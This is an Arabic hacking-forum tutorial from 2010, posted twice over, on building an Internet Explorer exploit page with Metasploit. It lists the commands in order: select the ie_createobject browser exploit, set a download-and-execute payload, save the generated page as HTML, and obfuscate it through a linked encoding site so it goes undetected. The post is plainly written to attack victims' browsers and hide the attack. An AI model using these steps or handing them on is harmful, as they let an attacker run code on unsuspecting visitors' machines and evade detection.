BLACK.JaGuAr
07-17-2010, 06:50 PM
http://www.samysoft.net/forumim/basmla/68565.gif
http://www.samysoft.net/forumim/slam/6867867.gif
تحية لكم ياأعضاء منتديات جيوش الهكرز ، سنتنال في موضوعنا إن شاء الله طريقة عمل ثغرة لمتصفح الإكسبلورر ، نقوم بفتح اداة الميتا Metasploit web وسوف تنفتح الاداة لنا في المتصفح كما في الصورة التالية :نضغط على خيار console ومن ثم ننفذ امر الاستعراض للاكسبلويتات
show exploits
http://www.aljyyosh.info/black/aljyyoshvb/ikhtraqmeta/thaghra/p1.jpg
نقوم باختيار الاكسبلويت التالي :
use windows/browser/ie_createobject
http://www.aljyyosh.info/black/aljyyoshvb/ikhtraqmeta/thaghra/p2.jpg
ومن ثم كالمعتاد نقوم باستعراض الخيارات بامر :
show options
وسنقوم بالتعديل على خيار الاسم بالامر :
set URIPATH xxxx
بدل xxxx ضع اي اسم تريد
http://www.aljyyosh.info/black/aljyyoshvb/ikhtraqmeta/thaghra/p4.jpg
بعد ذلك سنقوم باستعراض البايلودات وتحديد المناسب لنا من خلال الاوامر التالية :
show payloads
set payload windows/download_exec
http://www.aljyyosh.info/black/aljyyoshvb/ikhtraqmeta/thaghra/p5.jpg
بعد ذلك نقوم باستعراض الخيارات واعتقد معروف الامر ونطبق الموضح في الصور التالية :
http://www.aljyyosh.info/black/aljyyoshvb/ikhtraqmeta/thaghra/p6.jpg
http://www.aljyyosh.info/black/aljyyoshvb/ikhtraqmeta/thaghra/p7.jpg
الأن نقوم بتطبيق الخطوات والخيارات التي عدلناها سابقا من خلال الأمر :
exploit
سوف يعطينا رابط يحتوي على الثغرة التي قام بعملها نقوم بنسخ الرابط
http://www.aljyyosh.info/black/aljyyoshvb/ikhtraqmeta/thaghra/p8.jpg
نضع الرابط في المتصفح وستظهر لنا الثغرة نقوم بتحديد مصدر الصفحة ونقوم بتحديد الكل داخل المصدر ونقوم بنسخها ولصقها في ملف نوتباد وحفظها بامتداد html
http://www.aljyyosh.info/black/aljyyoshvb/ikhtraqmeta/thaghra/p9.jpg
سينتج لنا ملف للثغرة كما بالصورة التالية
http://www.aljyyosh.info/black/aljyyoshvb/ikhtraqmeta/thaghra/p10.jpg
طبعا الثغرة مكشوفة وتحتاج الى تشفير وهنالك العديد من المواقع التي تقدم خدمة تشفير ثغرات html وفي الرابط التالي احد المواقع
موقع تشفير (http://encrypt.alm3refh.com/Mailto-Encoder.html)
نسأل الله أن نكون قد وفقنا في إيصال الفكرة بشكل مناسب ونأسف على أي قصور
ودمتم سالمين
http://www.samysoft.net/forumim/slam/6867867.gif
تحية لكم ياأعضاء منتديات جيوش الهكرز ، سنتنال في موضوعنا إن شاء الله طريقة عمل ثغرة لمتصفح الإكسبلورر ، نقوم بفتح اداة الميتا Metasploit web وسوف تنفتح الاداة لنا في المتصفح كما في الصورة التالية :نضغط على خيار console ومن ثم ننفذ امر الاستعراض للاكسبلويتات
show exploits
http://www.aljyyosh.info/black/aljyyoshvb/ikhtraqmeta/thaghra/p1.jpg
نقوم باختيار الاكسبلويت التالي :
use windows/browser/ie_createobject
http://www.aljyyosh.info/black/aljyyoshvb/ikhtraqmeta/thaghra/p2.jpg
ومن ثم كالمعتاد نقوم باستعراض الخيارات بامر :
show options
وسنقوم بالتعديل على خيار الاسم بالامر :
set URIPATH xxxx
بدل xxxx ضع اي اسم تريد
http://www.aljyyosh.info/black/aljyyoshvb/ikhtraqmeta/thaghra/p4.jpg
بعد ذلك سنقوم باستعراض البايلودات وتحديد المناسب لنا من خلال الاوامر التالية :
show payloads
set payload windows/download_exec
http://www.aljyyosh.info/black/aljyyoshvb/ikhtraqmeta/thaghra/p5.jpg
بعد ذلك نقوم باستعراض الخيارات واعتقد معروف الامر ونطبق الموضح في الصور التالية :
http://www.aljyyosh.info/black/aljyyoshvb/ikhtraqmeta/thaghra/p6.jpg
http://www.aljyyosh.info/black/aljyyoshvb/ikhtraqmeta/thaghra/p7.jpg
الأن نقوم بتطبيق الخطوات والخيارات التي عدلناها سابقا من خلال الأمر :
exploit
سوف يعطينا رابط يحتوي على الثغرة التي قام بعملها نقوم بنسخ الرابط
http://www.aljyyosh.info/black/aljyyoshvb/ikhtraqmeta/thaghra/p8.jpg
نضع الرابط في المتصفح وستظهر لنا الثغرة نقوم بتحديد مصدر الصفحة ونقوم بتحديد الكل داخل المصدر ونقوم بنسخها ولصقها في ملف نوتباد وحفظها بامتداد html
http://www.aljyyosh.info/black/aljyyoshvb/ikhtraqmeta/thaghra/p9.jpg
سينتج لنا ملف للثغرة كما بالصورة التالية
http://www.aljyyosh.info/black/aljyyoshvb/ikhtraqmeta/thaghra/p10.jpg
طبعا الثغرة مكشوفة وتحتاج الى تشفير وهنالك العديد من المواقع التي تقدم خدمة تشفير ثغرات html وفي الرابط التالي احد المواقع
موقع تشفير (http://encrypt.alm3refh.com/Mailto-Encoder.html)
نسأل الله أن نكون قد وفقنا في إيصال الفكرة بشكل مناسب ونأسف على أي قصور
ودمتم سالمين